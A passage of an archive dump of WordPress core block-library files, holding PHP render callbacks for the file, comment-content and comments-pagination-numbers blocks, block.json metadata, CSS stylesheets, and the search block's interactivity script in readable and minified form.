			array( '@wordpress/interactivity' ),
			defined( 'GUTENBERG_VERSION' ) ? GUTENBERG_VERSION : get_bloginfo( 'version' )
		);
		wp_enqueue_script_module( '@wordpress/block-library/file' );

		$processor = new WP_HTML_Tag_Processor( $content );
		$processor->next_tag();
		$processor->set_attribute( 'data-wp-interactive', 'core/file' );
		$processor->next_tag( 'object' );
		$processor->set_attribute( 'data-wp-bind--hidden', '!state.hasPdfPreview' );
		$processor->set_attribute( 'hidden', true );

		$filename     = $processor->get_attribute( 'aria-label' );
		$has_filename = ! empty( $filename ) && 'PDF embed' !== $filename;
		$label        = $has_filename ? sprintf(
			/* translators: %s: filename. */
			__( 'Embed of %s.' ),
			$filename
		) : __( 'PDF embed' );

		// Update object's aria-label attribute if present in block HTML.
		// Match an aria-label attribute from an object tag.
		$processor->set_attribute( 'aria-label', $label );

		return $processor->get_updated_html();
	}

	return $content;
}

/**
 * Registers the `core/file` block on server.
 *
 * @since 5.8.0
 */
function register_block_core_file() {
	register_block_type_from_metadata(
		__DIR__ . '/file',
		array(
			'render_callback' => 'render_block_core_file',
		)
	);
}
add_action( 'init', 'register_block_core_file' );
comment-content.php000060400000004633151330427370010376 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-content` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comment-content` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Return the post comment's content.
 */
function render_block_core_comment_content( $attributes, $content, $block ) {
	if ( ! isset( $block->context['commentId'] ) ) {
		return '';
	}

	$comment            = get_comment( $block->context['commentId'] );
	$commenter          = wp_get_current_commenter();
	$show_pending_links = isset( $commenter['comment_author'] ) && $commenter['comment_author'];
	if ( empty( $comment ) ) {
		return '';
	}

	$args         = array();
	$comment_text = get_comment_text( $comment, $args );
	if ( ! $comment_text ) {
		return '';
	}

	/** This filter is documented in wp-includes/comment-template.php */
	$comment_text = apply_filters( 'comment_text', $comment_text, $comment, $args );

	$moderation_note = '';
	if ( '0' === $comment->comment_approved ) {
		$commenter = wp_get_current_commenter();

		if ( $commenter['comment_author_email'] ) {
			$moderation_note = __( 'Your comment is awaiting moderation.' );
		} else {
			$moderation_note = __( 'Your comment is awaiting moderation. This is a preview; your comment will be visible after it has been approved.' );
		}
		$moderation_note = '<p><em class="comment-awaiting-moderation">' . $moderation_note . '</em></p>';
		if ( ! $show_pending_links ) {
			$comment_text = wp_kses( $comment_text, array() );
		}
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	return sprintf(
		'<div %1$s>%2$s%3$s</div>',
		$wrapper_attributes,
		$moderation_note,
		$comment_text
	);
}

/**
 * Registers the `core/comment-content` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_content() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-content',
		array(
			'render_callback' => 'render_block_core_comment_content',
		)
	);
}
add_action( 'init', 'register_block_core_comment_content' );
details/style-rtl.css000060400000000135151330427370010642 0ustar00.wp-block-details{
  box-sizing:border-box;
}

.wp-block-details summary{
  cursor:pointer;
}details/editor-rtl.css000060400000000062151330427370010767 0ustar00.wp-block-details summary div{
  display:inline;
}details/editor.css000060400000000062151330427370010170 0ustar00.wp-block-details summary div{
  display:inline;
}details/style.css000060400000000135151330427370010043 0ustar00.wp-block-details{
  box-sizing:border-box;
}

.wp-block-details summary{
  cursor:pointer;
}details/style.min.css000060400000000121151330427370010620 0ustar00.wp-block-details{box-sizing:border-box}.wp-block-details summary{cursor:pointer}details/style-rtl.min.css000060400000000121151330427370011417 0ustar00.wp-block-details{box-sizing:border-box}.wp-block-details summary{cursor:pointer}details/block.json000060400000002724151330427370010164 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/details",
	"title": "Details",
	"category": "text",
	"description": "Hide and show additional content.",
	"keywords": [ "accordion", "summary", "toggle", "disclosure" ],
	"textdomain": "default",
	"attributes": {
		"showContent": {
			"type": "boolean",
			"default": false
		},
		"summary": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "summary"
		}
	},
	"supports": {
		"__experimentalOnEnter": true,
		"align": [ "wide", "full" ],
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"width": true,
			"style": true
		},
		"html": false,
		"spacing": {
			"margin": true,
			"padding": true,
			"blockGap": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"layout": {
			"allowEditing": false
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-details-editor",
	"style": "wp-block-details"
}
details/editor.min.css000060400000000055151330427370010754 0ustar00.wp-block-details summary div{display:inline}details/editor-rtl.min.css000060400000000055151330427370011553 0ustar00.wp-block-details summary div{display:inline}query-pagination-previous/block.json000060400000002033151330427370013676 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-pagination-previous",
	"title": "Previous Page",
	"category": "theme",
	"parent": [ "core/query-pagination" ],
	"description": "Displays the previous posts page link.",
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string"
		}
	},
	"usesContext": [
		"queryId",
		"query",
		"paginationArrow",
		"showLabel",
		"enhancedPagination"
	],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
nextpage/editor.min.css000060400000001120151330427370011134 0ustar00.block-editor-block-list__block[data-type="core/nextpage"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-nextpage{display:block;text-align:center;white-space:nowrap}.wp-block-nextpage>span{background:#fff;border-radius:4px;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;padding:6px 8px;position:relative;text-transform:uppercase}.wp-block-nextpage:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}nextpage/editor.css000060400000001241151330427370010356 0ustar00.block-editor-block-list__block[data-type="core/nextpage"]{
  margin-bottom:28px;
  margin-top:28px;
  max-width:100%;
  text-align:center;
}

.wp-block-nextpage{
  display:block;
  text-align:center;
  white-space:nowrap;
}
.wp-block-nextpage>span{
  background:#fff;
  border-radius:4px;
  color:#757575;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  font-weight:600;
  height:24px;
  padding:6px 8px;
  position:relative;
  text-transform:uppercase;
}
.wp-block-nextpage:before{
  border-top:3px dashed #ccc;
  content:"";
  left:0;
  position:absolute;
  right:0;
  top:50%;
}nextpage/editor-rtl.min.css000060400000001120151330427370011733 0ustar00.block-editor-block-list__block[data-type="core/nextpage"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-nextpage{display:block;text-align:center;white-space:nowrap}.wp-block-nextpage>span{background:#fff;border-radius:4px;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;padding:6px 8px;position:relative;text-transform:uppercase}.wp-block-nextpage:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}nextpage/editor-rtl.css000060400000001241151330427370011155 0ustar00.block-editor-block-list__block[data-type="core/nextpage"]{
  margin-bottom:28px;
  margin-top:28px;
  max-width:100%;
  text-align:center;
}

.wp-block-nextpage{
  display:block;
  text-align:center;
  white-space:nowrap;
}
.wp-block-nextpage>span{
  background:#fff;
  border-radius:4px;
  color:#757575;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  font-weight:600;
  height:24px;
  padding:6px 8px;
  position:relative;
  text-transform:uppercase;
}
.wp-block-nextpage:before{
  border-top:3px dashed #ccc;
  content:"";
  left:0;
  position:absolute;
  right:0;
  top:50%;
}nextpage/block.json000060400000000775151330427370010356 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/nextpage",
	"title": "Page Break",
	"category": "design",
	"description": "Separate your content into a multi-page experience.",
	"keywords": [ "next page", "pagination" ],
	"parent": [ "core/post-content" ],
	"textdomain": "default",
	"supports": {
		"customClassName": false,
		"className": false,
		"html": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-nextpage-editor"
}
search/theme-rtl.min.css000060400000000176151330427370011213 0ustar00.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}search/style.css000060400000005222151330427370007665 0ustar00.wp-block-search__button{
  margin-left:10px;
  word-break:normal;
}
.wp-block-search__button.has-icon{
  line-height:0;
}
.wp-block-search__button svg{
  height:1.25em;
  min-height:24px;
  min-width:24px;
  width:1.25em;
  fill:currentColor;
  vertical-align:text-bottom;
}

:where(.wp-block-search__button){
  border:1px solid #ccc;
  padding:6px 10px;
}

.wp-block-search__inside-wrapper{
  display:flex;
  flex:auto;
  flex-wrap:nowrap;
  max-width:100%;
}

.wp-block-search__label{
  width:100%;
}

.wp-block-search__input{
  appearance:none;
  border:1px solid #949494;
  flex-grow:1;
  margin-left:0;
  margin-right:0;
  min-width:3rem;
  padding:8px;
  text-decoration:unset !important;
}

.wp-block-search.wp-block-search__button-only .wp-block-search__button{
  flex-shrink:0;
  margin-left:0;
  max-width:100%;
}
.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{
  max-width:calc(100% - 100px);
}
.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{
  min-width:0 !important;
  transition-property:width;
}
.wp-block-search.wp-block-search__button-only .wp-block-search__input{
  flex-basis:100%;
  transition-duration:.3s;
}
.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{
  overflow:hidden;
}
.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{
  border-left-width:0 !important;
  border-right-width:0 !important;
  flex-basis:0;
  flex-grow:0;
  margin:0;
  min-width:0 !important;
  padding-left:0 !important;
  padding-right:0 !important;
  width:0 !important;
}

:where(.wp-block-search__input){
  font-family:inherit;
  font-size:inherit;
  font-style:inherit;
  font-weight:inherit;
  letter-spacing:inherit;
  line-height:inherit;
  text-transform:inherit;
}

:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){
  border:1px solid #949494;
  box-sizing:border-box;
  padding:4px;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{
  border:none;
  border-radius:0;
  padding:0 4px;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{
  outline:none;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){
  padding:4px 8px;
}

.wp-block-search.aligncenter .wp-block-search__inside-wrapper{
  margin:auto;
}

.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{
  float:right;
}search/view.js000060400000007611151330427370007327 0ustar00import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};

;// CONCATENATED MODULE: external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["getContext"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getContext), ["getElement"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getElement), ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store) });
;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/search/view.js
/**
 * WordPress dependencies
 */

const {
  actions
} = (0,interactivity_namespaceObject.store)('core/search', {
  state: {
    get ariaLabel() {
      const {
        isSearchInputVisible,
        ariaLabelCollapsed,
        ariaLabelExpanded
      } = (0,interactivity_namespaceObject.getContext)();
      return isSearchInputVisible ? ariaLabelExpanded : ariaLabelCollapsed;
    },
    get ariaControls() {
      const {
        isSearchInputVisible,
        inputId
      } = (0,interactivity_namespaceObject.getContext)();
      return isSearchInputVisible ? null : inputId;
    },
    get type() {
      const {
        isSearchInputVisible
      } = (0,interactivity_namespaceObject.getContext)();
      return isSearchInputVisible ? 'submit' : 'button';
    },
    get tabindex() {
      const {
        isSearchInputVisible
      } = (0,interactivity_namespaceObject.getContext)();
      return isSearchInputVisible ? '0' : '-1';
    }
  },
  actions: {
    openSearchInput(event) {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      if (!ctx.isSearchInputVisible) {
        event.preventDefault();
        ctx.isSearchInputVisible = true;
        ref.parentElement.querySelector('input').focus();
      }
    },
    closeSearchInput() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      ctx.isSearchInputVisible = false;
    },
    handleSearchKeydown(event) {
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      // If Escape close the menu.
      if (event?.key === 'Escape') {
        actions.closeSearchInput();
        ref.querySelector('button').focus();
      }
    },
    handleSearchFocusout(event) {
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      // If focus is outside search form, and in the document, close menu
      // event.target === The element losing focus
      // event.relatedTarget === The element receiving focus (if any)
      // When focusout is outside the document,
      // `window.document.activeElement` doesn't change.
      if (!ref.contains(event.relatedTarget) && event.target !== window.document.activeElement) {
        actions.closeSearchInput();
      }
    }
  }
}, {
  lock: true
});

search/theme.css000060400000000215151330427370007624 0ustar00.wp-block-search .wp-block-search__label{
  font-weight:700;
}

.wp-block-search__button{
  border:1px solid #ccc;
  padding:.375em .625em;
}search/style.min.css000060400000004625151330427370010455 0ustar00.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-left:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{max-width:calc(100% - 100px)}.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:right}search/theme-rtl.css000060400000000215151330427370010423 0ustar00.wp-block-search .wp-block-search__label{
  font-weight:700;
}

.wp-block-search__button{
  border:1px solid #ccc;
  padding:.375em .625em;
}search/editor.min.css000060400000000452151330427370010575 0ustar00.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{margin:auto}.wp-block-search .wp-block-search__button{align-items:center;border-radius:initial;display:flex;height:auto;justify-content:center;text-align:center}.wp-block-search__components-button-group{margin-top:10px}search/editor.css000060400000000513151330427370010011 0ustar00.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{
  margin:auto;
}

.wp-block-search .wp-block-search__button{
  align-items:center;
  border-radius:initial;
  display:flex;
  height:auto;
  justify-content:center;
  text-align:center;
}
.wp-block-search__components-button-group{
  margin-top:10px;
}search/style-rtl.min.css000060400000004626151330427370011255 0ustar00.wp-block-search__button{margin-right:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:unset!important}.wp-block-search.wp-block-search__button-only .wp-block-search__button{flex-shrink:0;margin-right:0;max-width:100%}.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{max-width:calc(100% - 100px)}.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{min-width:0!important;transition-property:width}.wp-block-search.wp-block-search__button-only .wp-block-search__input{flex-basis:100%;transition-duration:.3s}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){border:1px solid #949494;box-sizing:border-box;padding:4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border:none;border-radius:0;padding:0 4px}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:4px 8px}.wp-block-search.aligncenter .wp-block-search__inside-wrapper{margin:auto}.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:left}search/style-rtl.css000060400000005223151330427370010465 0ustar00.wp-block-search__button{
  margin-right:10px;
  word-break:normal;
}
.wp-block-search__button.has-icon{
  line-height:0;
}
.wp-block-search__button svg{
  height:1.25em;
  min-height:24px;
  min-width:24px;
  width:1.25em;
  fill:currentColor;
  vertical-align:text-bottom;
}

:where(.wp-block-search__button){
  border:1px solid #ccc;
  padding:6px 10px;
}

.wp-block-search__inside-wrapper{
  display:flex;
  flex:auto;
  flex-wrap:nowrap;
  max-width:100%;
}

.wp-block-search__label{
  width:100%;
}

.wp-block-search__input{
  appearance:none;
  border:1px solid #949494;
  flex-grow:1;
  margin-left:0;
  margin-right:0;
  min-width:3rem;
  padding:8px;
  text-decoration:unset !important;
}

.wp-block-search.wp-block-search__button-only .wp-block-search__button{
  flex-shrink:0;
  margin-right:0;
  max-width:100%;
}
.wp-block-search.wp-block-search__button-only .wp-block-search__button[aria-expanded=true]{
  max-width:calc(100% - 100px);
}
.wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{
  min-width:0 !important;
  transition-property:width;
}
.wp-block-search.wp-block-search__button-only .wp-block-search__input{
  flex-basis:100%;
  transition-duration:.3s;
}
.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{
  overflow:hidden;
}
.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__input{
  border-left-width:0 !important;
  border-right-width:0 !important;
  flex-basis:0;
  flex-grow:0;
  margin:0;
  min-width:0 !important;
  padding-left:0 !important;
  padding-right:0 !important;
  width:0 !important;
}

:where(.wp-block-search__input){
  font-family:inherit;
  font-size:inherit;
  font-style:inherit;
  font-weight:inherit;
  letter-spacing:inherit;
  line-height:inherit;
  text-transform:inherit;
}

:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){
  border:1px solid #949494;
  box-sizing:border-box;
  padding:4px;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{
  border:none;
  border-radius:0;
  padding:0 4px;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{
  outline:none;
}
:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){
  padding:4px 8px;
}

.wp-block-search.aligncenter .wp-block-search__inside-wrapper{
  margin:auto;
}

.wp-block[data-align=right] .wp-block-search.wp-block-search__button-only .wp-block-search__inside-wrapper{
  float:left;
}search/view.min.js000060400000002437151330427370010112 0ustar00import*as e from"@wordpress/interactivity";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)};const n=(e=>{var n={};return t.d(n,e),n})({getContext:()=>e.getContext,getElement:()=>e.getElement,store:()=>e.store}),{actions:r}=(0,n.store)("core/search",{state:{get ariaLabel(){const{isSearchInputVisible:e,ariaLabelCollapsed:t,ariaLabelExpanded:r}=(0,n.getContext)();return e?r:t},get ariaControls(){const{isSearchInputVisible:e,inputId:t}=(0,n.getContext)();return e?null:t},get type(){const{isSearchInputVisible:e}=(0,n.getContext)();return e?"submit":"button"},get tabindex(){const{isSearchInputVisible:e}=(0,n.getContext)();return e?"0":"-1"}},actions:{openSearchInput(e){const t=(0,n.getContext)(),{ref:r}=(0,n.getElement)();t.isSearchInputVisible||(e.preventDefault(),t.isSearchInputVisible=!0,r.parentElement.querySelector("input").focus())},closeSearchInput(){(0,n.getContext)().isSearchInputVisible=!1},handleSearchKeydown(e){const{ref:t}=(0,n.getElement)();"Escape"===e?.key&&(r.closeSearchInput(),t.querySelector("button").focus())},handleSearchFocusout(e){const{ref:t}=(0,n.getElement)();t.contains(e.relatedTarget)||e.target===window.document.activeElement||r.closeSearchInput()}}},{lock:!0});search/view.asset.php000060400000000124151330427370010610 0ustar00<?php return array('dependencies' => array(), 'version' => '2a0784014283afdd3c25');
search/editor-rtl.min.css000060400000000452151330427370011374 0ustar00.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{margin:auto}.wp-block-search .wp-block-search__button{align-items:center;border-radius:initial;display:flex;height:auto;justify-content:center;text-align:center}.wp-block-search__components-button-group{margin-top:10px}search/editor-rtl.css000060400000000513151330427370010610 0ustar00.wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{
  margin:auto;
}

.wp-block-search .wp-block-search__button{
  align-items:center;
  border-radius:initial;
  display:flex;
  height:auto;
  justify-content:center;
  text-align:center;
}
.wp-block-search__components-button-group{
  margin-top:10px;
}search/block.json000060400000003750151330427370010004 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/search",
	"title": "Search",
	"category": "widgets",
	"description": "Help visitors find your content.",
	"keywords": [ "find" ],
	"textdomain": "default",
	"attributes": {
		"label": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"showLabel": {
			"type": "boolean",
			"default": true
		},
		"placeholder": {
			"type": "string",
			"default": "",
			"__experimentalRole": "content"
		},
		"width": {
			"type": "number"
		},
		"widthUnit": {
			"type": "string"
		},
		"buttonText": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"buttonPosition": {
			"type": "string",
			"default": "button-outside"
		},
		"buttonUseIcon": {
			"type": "boolean",
			"default": false
		},
		"query": {
			"type": "object",
			"default": {}
		},
		"isSearchFieldHidden": {
			"type": "boolean",
			"default": false
		}
	},
	"supports": {
		"align": [ "left", "center", "right" ],
		"color": {
			"gradients": true,
			"__experimentalSkipSerialization": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"interactivity": true,
		"typography": {
			"__experimentalSkipSerialization": true,
			"__experimentalSelector": ".wp-block-search__label, .wp-block-search__input, .wp-block-search__button",
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__experimentalBorder": {
			"color": true,
			"radius": true,
			"width": true,
			"__experimentalSkipSerialization": true,
			"__experimentalDefaultControls": {
				"color": true,
				"radius": true,
				"width": true
			}
		},
		"html": false
	},
	"editorStyle": "wp-block-search-editor",
	"style": "wp-block-search"
}
search/view.min.asset.php000060400000000124151330427370011372 0ustar00<?php return array('dependencies' => array(), 'version' => '765a40956d200c79d99e');
search/theme.min.css000060400000000176151330427370010414 0ustar00.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}comments-pagination-numbers.php000060400000003140151330427370012701 0ustar00<?php
/**
 * Server-side rendering of the `core/comments-pagination-numbers` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-pagination-numbers` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the pagination numbers for the comments.
 */
function render_block_core_comments_pagination_numbers( $attributes, $content, $block ) {
	// Bail out early if the post ID is not set for some reason.
	if ( empty( $block->context['postId'] ) ) {
		return '';
	}

	$comment_vars = build_comment_query_vars_from_block( $block );

	$total   = ( new WP_Comment_Query( $comment_vars ) )->max_num_pages;
	$current = ! empty( $comment_vars['paged'] ) ? $comment_vars['paged'] : null;

	// Render links.
	$content = paginate_comments_links(
		array(
			'total'     => $total,
			'current'   => $current,
			'prev_next' => false,
			'echo'      => false,
		)
	);

	if ( empty( $content ) ) {
		return '';
	}

	$wrapper_attributes = get_block_wrapper_attributes();

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$content
	);
}

/**
 * Registers the `core/comments-pagination-numbers` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comments_pagination_numbers() {
	register_block_type_from_metadata(
		__DIR__ . '/comments-pagination-numbers',
		array(
			'render_callback' => 'render_block_core_comments_pagination_numbers',
		)
	);
}
add_action( 'init', 'register_block_core_comments_pagination_numbers' );
legacy-widget/block.json000060400000001054151330427370011257 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/legacy-widget",
	"title": "Legacy Widget",
	"category": "widgets",
	"description": "Display a legacy widget.",
	"textdomain": "default",
	"attributes": {
		"id": {
			"type": "string",
			"default": null
		},
		"idBase": {
			"type": "string",
			"default": null
		},
		"instance": {
			"type": "object",
			"default": null
		}
	},
	"supports": {
		"html": false,
		"customClassName": false,
		"reusable": false
	},
	"editorStyle": "wp-block-legacy-widget-editor"
}
